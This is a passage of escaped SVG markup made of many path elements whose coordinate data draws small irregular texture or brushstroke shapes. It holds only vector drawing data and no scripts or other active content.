d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path 